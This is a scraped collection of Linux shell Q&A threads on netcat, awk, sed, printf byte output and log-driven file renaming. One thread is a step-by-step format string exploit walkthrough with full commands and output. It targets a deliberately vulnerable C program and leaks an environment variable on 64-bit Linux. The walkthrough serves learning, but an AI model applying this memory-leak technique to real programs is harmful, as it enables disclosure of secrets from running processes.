How can I close a netcat connection after a certain character is returned in the response? - linux

We have a very simple tcp messaging script that cats some text to a server port which returns and displays a response.
The part of the script we care about looks something like this:
cat someFile | netcat somehost 1234
The response the server returns is 'complete' once we get a certain character code (specifically &001C) returned.
How can I close the connection when I receive this special character?
(Note: The server won't close the connection for me. While I currently just CTRL+C the script when I can tell it's done, I wish to be able to send many of these messages, one after the other.)
(Note: netcat -w x isn't good enough because I wish to push these messages through as fast as possible)

Create a bash script called client.sh:
#!/bin/bash
cat someFile
while read FOO; do
echo $FOO >&3
if [[ $FOO =~ `printf ".*\x00\x1c.*"` ]]; then
break
fi
done
Then invoke netcat from your main script like so:
3>&1 nc -c ./client.sh somehost 1234
(You'll need bash version 3 for the regexp matching).
This assumes that the server is sending data in lines - if not you'll have to tweak client.sh so that it reads and echoes a character at a time.

How about this?
Client side:
awk -v RS=$'\x1c' 'NR==1;{exit 0;}' < /dev/tcp/host-ip/port
Testing:
# server side test script
while true; do ascii -hd; done | { netcat -l 12345; echo closed...;}
# Generate 'some' data for testing & pipe to netcat.
# After netcat connection closes, echo will print 'closed...'
# Client side:
awk -v RS=J 'NR==1; {exit;}' < /dev/tcp/localhost/12345
# Changed end character to 'J' for testing.
# Didn't wish to write a server side script to generate 0x1C.
Client side produces:
0 NUL 16 DLE 32 48 0 64 # 80 P 96 ` 112 p
1 SOH 17 DC1 33 ! 49 1 65 A 81 Q 97 a 113 q
2 STX 18 DC2 34 " 50 2 66 B 82 R 98 b 114 r
3 ETX 19 DC3 35 # 51 3 67 C 83 S 99 c 115 s
4 EOT 20 DC4 36 $ 52 4 68 D 84 T 100 d 116 t
5 ENQ 21 NAK 37 % 53 5 69 E 85 U 101 e 117 u
6 ACK 22 SYN 38 & 54 6 70 F 86 V 102 f 118 v
7 BEL 23 ETB 39 ' 55 7 71 G 87 W 103 g 119 w
8 BS 24 CAN 40 ( 56 8 72 H 88 X 104 h 120 x
9 HT 25 EM 41 ) 57 9 73 I 89 Y 105 i 121 y
10 LF 26 SUB 42 * 58 : 74
After 'J' appears, server side closes & prints 'closed...', ensuring that the connection has indeed closed.

Try:
(cat somefile; sleep $timeout) | nc somehost 1234 | sed -e '{s/\x01.*//;T skip;q;:skip}'
This requires GNU sed.
How it works:
{
s/\x01.*//; # search for \x01, if we find it, kill it and the rest of the line
T skip; # goto label skip if the last s/// failed
q; # quit, printing current pattern buffer
:skip # label skip
}
Note that this assumes there'll be a newline after \x01 - sed won't see it otherwise, as sed operates line-by-line.

Maybe have a look at Ncat as well:
"Ncat is the culmination of many key features from various Netcat incarnations such as Netcat 1.x, Netcat6, SOcat, Cryptcat, GNU Netcat, etc. Ncat has a host of new features such as "Connection Brokering", TCP/UDP Redirection, SOCKS4 client and server supprt, ability to "Chain" Ncat processes, HTTP CONNECT proxying (and proxy chaining), SSL connect/listen support, IP address/connection filtering, plus much more."
http://nmap-ncat.sourceforge.net

This worked best for me. Just read the output with a while loop and then check for "0x1c" using an if statement.
while read i; do
if [ "$i" = "0x1c" ] ; then # Read until "0x1c". Then exit
break
fi
echo $i;
done < <(cat someFile | netcat somehost 1234)

Related

Reading an environment variable using the format string vulnerability in a 64 bit OS

I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web, however the examples that I've found only cover 32 bits Linux, and my desktop's running a 64 bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that I put my test variable and get its address. Then I pass it to the program as a parameter and I add a bunch of format in order to read from them:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ /getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format strings always got both mixed, so I moved the address to the back and added some padding of my own, so I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of both the python one-liner and printf (with an extra '%' due to the way the second printf parses a single '%' - be sure to remove this extra '%' after you test it with od/hexdump/whathaveyou)
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' wont work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.

shell script to change directory to the tail result path

I'm using Tail to an error happen on the log lines like:
tail -f syschecklog.log | grep "ERROR processEvent: /mnt/docs/"
and this gives results like:
01.lnxp.com 2019-03-13 07:10:24, 345 ERROR processEvent: /mnt/docs/003217899/cfo paid ¿ inv -inc 1234321
So what I do manually is to change the path using cd:
cd /mnt/docs/003217899/
Is there any script to change directory automatically? As I run another manual script to change file names for the files contained in /003217899/, those like /003217899/ are happening many times a day, and they are changing, so I need this script to automatically catch those errors, and change the path then run a file name change script.
In addition to the above, the log line has another subfolder that contains a error file name like /mnt/docs/003217899/attch/fees ¿ to be paid. How can we cd to that directory?
After Altering [Update]
grep "ERROR processEvent: /mnt/docs/" syschecklog.log | sed 's#.*ERROR processEvent: /mnt/docs/ \(/.*\)/.*#\1#' | while read -r DIR
do
BASEDIR=${DIR%/*}
if [ "$BASEDIR" != /mnt/docs/ ]
then
( cd "$BASEDIR" && find -type f -exec touch {} + | python -c 'import os, re; [os.rename(i, re.sub(r"\?", "¿", i)) for i in os.listdir(".")]' )
fi
# end of code for additional requirement
( cd "$DIR" && find -type f -exec touch {} + | python -c 'import os, re;
[os.rename(i, re.sub(r"\?", "¿", i)) for i in os.listdir(".")]' )
done
Results:
[results][1]
3rd script updated for renameFiles();
$ renameFiles()
> {
> # The next line is copied unchanged from the question. This could be improved.
> find -type f -exec touch {} + | python -c 'import os, re; [os.rename(i, re.sub(r"\?", "¿", i)) for i in os.listdir(".")]'
> }
$
$ # Two possible variants because the question was modified.
$ #
$ # To process the complete input file as it is now
$ # grep "ERROR processEvent: /mnt/docs/" syschecklog.log | ...
$ #
$ # To continuously follow the file
$ # tail -f /mnt/docs/syschecklog.log | grep "ERROR processEvent: /mnt/docs/" | ...
$
$ grep "ERROR processEvent: /mnt/docs/" syschecklog.log | sed 's#.*ERROR processEvent: \(/.*\)/.*#\1#' | while read -r DIR
> do
> # additional requirement from comment: if DIR is /mnt/docs/003217899/attch
> # the script should be run both in .../003217899 and .../attch
> BASEDIR=${DIR%/*}
> if [ "$BASEDIR" != /mnt/docs/ ]
> then
> ( cd "$BASEDIR" && renameFiles)
> fi
> # end of code for additional requirement
> ( cd "$DIR" && renameFiles)
> done
-bash: cd: /mnt/docs/001234579/Exp8888861¿_Applicant_Case_Conference_l (No such file or directory): No such file or directory
-bash: cd: /mnt/docs/001888579/¿_SENIOR_RESOLUTION_MANAGER_i(No such file or directory): No such file or directory
-bash: cd: /mnt/docs/001234579/Exp2222276¿18 from all and Treatments Inc. February 27_ 20199999(No such file or directory): No such file or directory
3rd results [3rd results][2]
-bash: cd: /mnt/docs/001234579/Exp8888861¿_Applicant_Case_Conference_l (No such file or directory): No such file or directory
-bash: cd: /mnt/docs/001888579/¿_SENIOR_RESOLUTION_MANAGER_i(No such file or directory): No such file or directory
-bash: cd: /mnt/docs/001234579/Exp2222276¿18 from all and Treatments Inc. February 27_ 20199999(No such file or directory): No such file or directory
grep results as you requested;
grep "ERROR processEvent: /mnt/docs/" syschecklog.log
01.lnxp.com 3 2019-03-14 07:04:30,446 ERROR processEvent: /mnt/docs/001111224/Exposure2178861/Email_from_LAT__18_009945_AABS¿__Summary_not_received12128050 (No such file or directory)
01.lnxp.com 3 2019-03-14 07:05:13,137 ERROR processEvent: /mnt/docs/001567890/Coop_subro_question__TO__ZED_LANDERS_¿_SENIOR__Basse12130781 (No such file or directory)
01.lnxp.com 3 2019-03-14 07:05:19,914 ERROR processEvent: /mnt/docs/001323289/Exposure2622276/OCF¿18 from All and Treatments Inc. February 27_ 201912129762 (No such file or directory)
Results of Locale
$ locale
LANG=en_CA.UTF-8
LC_CTYPE="en_CA.UTF-8"
LC_NUMERIC="en_CA.UTF-8"
LC_TIME="en_CA.UTF-8"
LC_COLLATE="en_CA.UTF-8"
LC_MONETARY="en_CA.UTF-8"
LC_MESSAGES="en_CA.UTF-8"
LC_PAPER="en_CA.UTF-8"
LC_NAME="en_CA.UTF-8"
LC_ADDRESS="en_CA.UTF-8"
LC_TELEPHONE="en_CA.UTF-8"
LC_MEASUREMENT="en_CA.UTF-8"
LC_IDENTIFICATION="en_CA.UTF-8"
LC_ALL=
Results of fgrep python yourscript | od -c -tx1
$ fgrep python invert.sh | od -c -tx1
0000000 f i n d - t y p e
20 20 20 20 66 69 6e 64 20 20 2d 74 79 70 65 20
0000020 f - e x e c t o u c h {
66 20 20 2d 65 78 65 63 20 74 6f 75 63 68 20 7b
0000040 } + | p y t h o n - c
7d 20 2b 20 7c 20 70 79 74 68 6f 6e 20 2d 63 20
0000060 ' i m p o r t o s , r e ;
27 69 6d 70 6f 72 74 20 6f 73 2c 20 72 65 3b 20
0000100 [ o s . r e n a m e ( i , r e
5b 6f 73 2e 72 65 6e 61 6d 65 28 69 2c 20 72 65
0000120 . s u b ( r " \ ? " , " 302 277 "
2e 73 75 62 28 72 22 5c 3f 22 2c 20 22 c2 bf 22
0000140 , i ) ) f o r i i n o
2c 20 69 29 29 20 66 6f 72 20 69 20 69 6e 20 6f
0000160 s . l i s t d i r ( " . " ) ] '
73 2e 6c 69 73 74 64 69 72 28 22 2e 22 29 5d 27
0000200 \n
0a
0000201
I need to change each '?' in the filename to '¿' as the system creates '?' and it shows as '¿', so have to change to that where the server can understand it!
I found that Capital A with hat is created by itself in the system, using CAT
cat invert.sh
#!/bin/bash
renameFiles()
{
find -type f -exec touch {} + | python -c 'import os, re; [os.rename(i, re.sub(r"\?", "¿", i)) for i in os.listdir(".")]'
}
grep "ERROR processEvent: /mnt/docs/" syschecklog.log | sed 's#.*ERROR processEvent: /mnt/docs/ \(/.*\)/.*#\1#' | while read -r DIR
do
BASEDIR=${DIR%/*}
if [ "$BASEDIR" != /mnt/cc-docs ]
then
( cd "$BASEDIR" && renameFiles)
fi
( cd "$DIR" && renameFiles)
results of od -c -txl, on the error file;
echo *|od -c -tx1
0000000 O C F - 2 1 I n v 2 0 8 3 5
4f 43 46 2d 32 31 20 49 6e 76 20 32 30 38 33 35
0000020 9 9 A s s e s s M e d $ 6 2
39 39 20 41 73 73 65 73 73 4d 65 64 20 24 36 32
0000040 1 . 5 0 ( H a n g Q ) ?
31 2e 35 30 20 28 48 61 6e 67 20 51 29 20 3f 20
0000060 d t d F e b 2 7 _ 2 0 1 9
64 74 64 20 46 65 62 20 32 37 5f 20 32 30 31 39
0000100 1 2 1 7 4 5 8 3 \n
31 32 31 37 34 35 38 33 0a
0000111
Checked the systems when using eco on hex encoding on ¿, its attaching  to it as below;
$echo -e '\xc2\xbf'
¿
Script modified again for additional requirements.
(As I did not get answers to all questions I modified the script based on the incomplete information.)
Instead of processing two directories separately the script now uses find in the parent directory (or the only directory), renames and touches all files that contain a '?' in the name. (-name '*\?*').
#! /bin/bash
# Two possible variants because the question was modified.
#
# To process the complete input file as it is now
# fgrep "ERROR processEvent: /mnt/docs/" syschecklog.log | ...
#
# To continuously follow the file
# tail -f syschecklog.log| fgrep "ERROR processEvent: /mnt/docs/" | ...
# The "LANG=C sed ..." avoids problems with invalid UTF-8 characters that do not match '.' in sed's pattern
fgrep "ERROR processEvent: /mnt/docs/" syschecklog.log | LANG=C sed 's#.*ERROR processEvent: \(/mnt/docs/[^/]*\)/.*#\1#' | while IFS= read -r DIR
do
find "$DIR" -name '*\?*' | while IFS= read -r FILE
do
NEW=$(echo "$FILE"| tr '?' $'\xBF')
mv "$FILE" "$NEW"
touch "$NEW"
done
done
Note that grep and sed will switch to buffered output when used in a pipeline. This will delay the processing of the extracted lines. You might have to disable buffering for the commands in the pipeline, see http://mywiki.wooledge.org/BashFAQ/009
2nd major update
There was a problem with invalid characters. In a UTF-8 environment sed behaves strangely when the input contains bytes that are not valid UTF-8 charactes. The pattern . does not match these invalid characters. (The example file contains a byte with the value 0xBF. See http://www.linuxproblem.org/art_21.html. Setting LANG=C for the sed command fixes this problem.
I tested my script with the grep output added to the question. I wrote this into a file somelog.log. I modified my script to use grep pattern somelog.log | ... with a local file instead of using a log file with a full path which does not exist on my test system.
After adding LANG=C to the sed command the script ran successfully with the raw input file provided as an external link.
The output is
$ grep "ERROR processEvent: /mnt/docs/" syschecklog.log | sed 's#.*ERROR processEvent: \(/.*\)/.*#\1#' | while read -r DIR; do BASEDIR=${DIR%/*}; if [ "$BASEDIR" != /mnt/docs/ ]; then ( cd "$BASEDIR" && renameFiles); fi; ( cd "$DIR" && renameFiles); done
bash: cd: /mnt/docs/001234567: No such file or directory
bash: cd: /mnt/docs/001234567/Subdir9876543: No such file or directory
bash: cd: /mnt/docs/002345678: No such file or directory
bash: cd: /mnt/docs/003456789: No such file or directory
bash: cd: /mnt/docs/003456789/Subdir8765432: No such file or directory
... (more similar lines removed)
You can see that it tried to cd into the directories from the log messages. It does not show parts of the file name. In my case it simply failed because the directories don't exist. I think the script should work.
After replacing the two cd and renameFiles commands with find... the output with my test is
find: ‘/mnt/docs/001234567’: No such file or directory
find: ‘/mnt/docs/002345678’: No such file or directory
find: ‘/mnt/docs/003456789’: No such file or directory
...

find length of a fixed width file wtih a little twist

Hi Wonderful People/My Gurus and all kind-hearted people.
I've a fixed width file and currently i'm trying to find the length of those rows that contain x bytes. I tried couple of awk commands but, it is not giving me the result that i wanted. My fixed width contains 208bytes, but there are few rows that don't contain 208 bytes. I"m trying to discover those records that doesn't have 208bytes.
this cmd gave me the file length
awk '{print length;exit}' file.text
here i tried to print rows that contain 101 bytes, but it didn't work.
awk '{print length==101}' file.text
Any help/insights here would be highly helpful
With awk:
awk 'length() < 208' file
Well, length() gives you the number of characters, not bytes. This number can differ in unicode context. You can use the LANG environment variable to force awk to use bytes:
LANG=C awk 'length() < 208' file
Perl to the rescue!
perl -lne 'print "$.:", length if length != 208' -- file.text
-n reads the input line by line
-l removes newlines from the input before processing it and adds them to print
The one-liner will print line number ($.) and the length of the line for each line whose length is different than 208.
if you're using gawk, then it's no issue, even in typical UTF-8 locale mode :
length(s) = # chars native to locale,
# typically that means # utf-8 chars
match(s, /$/) - 1 = # raw bytes # this also work for pure-binary
# inputs, without triggering
# any error messages in gawk Unicode mode
Best illustrated by example :
0000000 3347498554 3381184647 3182945161 171608122
: Ɔ ** LJ ** Ȉ ** ɉ ** 㷽 ** ** : 210 : \n
072 306 206 307 207 310 210 311 211 343 267 275 072 210 072 012
: ? 86 ? 87 ? 88 ? 89 ? ? ? : 88 : nl
58 198 134 199 135 200 136 201 137 227 183 189 58 136 58 10
3a c6 86 c7 87 c8 88 c9 89 e3 b7 bd 3a 88 3a 0a
0000020
# gawk profile, created Sat Oct 29 20:32:49 2022
BEGIN {
1 __ = "\306\206\307\207\310" (_="\210") \
"\311\211\343\267\275"
1 print "",__,_
1 STDERR = "/dev/stderr"
1 print ( match(_, /$/) - 1, "_" ) > STDERR # *A
1 print ( length(__), match(__, /$/) - 1 ) > STDERR # *B
1 print ( (__~_), match(__, (_) ".*") ) > STDERR # *C
1 print ( RSTART, RLENGTH ) > STDERR # *D
}
1 | _ *A # of bytes off "_" because it was defined as 0x88 \210
5 | 11 *B # of chars of "__", and
# of bytes of it :
# 4 x 2-byte UC
# + 1 x 3-byte UC = 11
1 | 3 *C # does byte \210 exist among larger string (true/1),
# and which unicode character is 1st to
# contain \210 - the 3rd one, by original definition
3 | 3 *D # notice I also added a ".*" to the tail of this match() :
# if the left-side string being tested is valid UTF-8,
# then this will match all the way to the end of string,
# inclusive, in which you can deduce :
#
# "\210 first appeared in 3rd-to-last utf-8 character"
Combining that inferred understanding :
RLENGTH = "3 chars to the end, inclusive",
with knowledge of how many to its left :
RSTART - 1 = "2 chars before",
yields a total count of 3 + 2 = 5, affirming length()'s result

Emitting a character (or multi-byte binary string) by integer ordinal in bash

I'm trying to echo integer in bash as is, without converting each digit to ASCII and outputting corresponding sequence. e.g.
echo "123" | hd
00000000 31 32 33 0a |123.|
it's outputting ASCII codes of each character. How can I output 123 itself, as unsigned integer for example? so that I get something like
00000000 0x7B 00 00 00
That's a job for printf
$ printf "\x$(printf '%x' "123")" | hd
00000000 7b |{|
The internal printf converts the decimal number 123 to hexadecimal and the external printf use \x to create a byte with that value.
If you want several bytes, use this:
$ printf '%b' "$(printf '\\x%x' "123" "96" "68")" | hd
00000000 7b 60 44 |{`D|
Or, if you want to use hexadecimal:
$ printf '%b' "$(printf '\\x%x' "0x7f" "0xFF" "0xFF")" | hd
00000000 7f ff ff |...|
Or, in this case, simply:
$ printf '\x7f\xFF\xFF' | hd
00000000 7f ff ff |...|
You have to be careful of endianess. x86 is little endian so you must store least significant byte first.
As an example, if you want to store the 32bit integer : 2'937'252'660d = AF'12'EB'34h on disk, you have to write : 0x34, then 0xEB, then 0x12 and then 0xAF, in that order.
Is use this helper for the same purpose as yours:
printf "%.4x\n" 2937252660 | fold -b2 | tac | while read a; do echo -e -n "\\x${a}"; done
printf change from dec base to hex base
fold splits by groups of 2 chars, i.e 1 byte
tac reverse the lines (this is where little-endian is applied)
while loop echo one raw byte at a time
Borrowing the observation from #Setop's answer that the examples imply that the OP wants uint32s, but trying to build a more efficient implementation (involving no subshells or external commands):
print_byte() {
local val
printf -v val '%02x' "$1"
printf '%b' "\x${val}"
}
print_uint32() {
print_byte "$(( ( $1 / (( 256 ** 0 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 1 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 2 )) ) % 256 ))"
print_byte "$(( ( $1 / (( 256 ** 3 )) ) % 256 ))"
}
Thus:
print_uint32 32 | xxd # this should be a single space, padded with nulls
...correctly yields:
00000000: 2000 0000 ...
...as demonstrated to reverse back to the original value by the Python struct.unpack() module:
$ print_uint32 32 |
> python -c 'import struct, sys; print struct.unpack("I", sys.stdin.read())'
32

Selecting one value per row - awk

I have a file formatted like:
10.0.0.1 87.220.150.64 131
10.0.0.1 87.220.172.219 131
10.0.0.1 87.220.74.162 131
10.0.0.1 87.220.83.17 58
10.0.0.1 87.220.83.17 58
1.160.138.209 10.0.0.249 177
1.160.138.209 10.0.0.249 354
1.160.138.249 10.0.0.124 296
1.160.139.125 10.0.0.252 129
1.160.139.207 10.0.0.142 46
The first and the second columns are IP addresses and the third one is the bytes transferred between IPs. I have to count how many bytes each 10.something IP-address has sent or received.
I used following awk program to calculate how many bytes each IP had sent but I cant figure out how to edit it to also calculate the received bytes.
awk '{ a[$1 " " $2] += $3 } END { for (i in a) { print i " " a[i] } }' input.txt | sort -n
This doesn't distinguish between bytes sent and bytes received.
# bytes-txrx.awk -- print bytes sent or received by each 10.* ip address.
# Does not guard against overflow.
#
# Input file format:
# 10.0.0.1 87.220.150.64 131
# 10.0.0.1 87.220.172.219 131
# 10.0.0.1 87.220.74.162 131
# 10.0.0.1 87.220.83.17 58
# 10.0.0.1 87.220.83.17 58
# 1.160.138.209 10.0.0.249 177
# 1.160.138.209 10.0.0.249 354
# 1.160.138.249 10.0.0.124 296
# 1.160.139.125 10.0.0.252 129
# 1.160.139.207 10.0.0.142 46
#
$1 ~ /^10\./ {a[$1] += $3;}
$2 ~ /^10\./ {a[$2] += $3;}
END {
for (key in a) {
print key, a[key];
}
}
$ awk -f test.awk test.dat
10.0.0.1 509
10.0.0.252 129
10.0.0.249 531
10.0.0.142 46
10.0.0.124 296
Just sort by column 2 and you have it:
$ awk '{ a[$1 " " $2] += $3 } END { for (i in a) { print i " " a[i] } }' input.txt | sort -n -k 2
But your description does not match the calculation. You do not calculate how much an IP sends. You calculate how much is send from A to B. And the amount A sends it the same as B receives.

Resources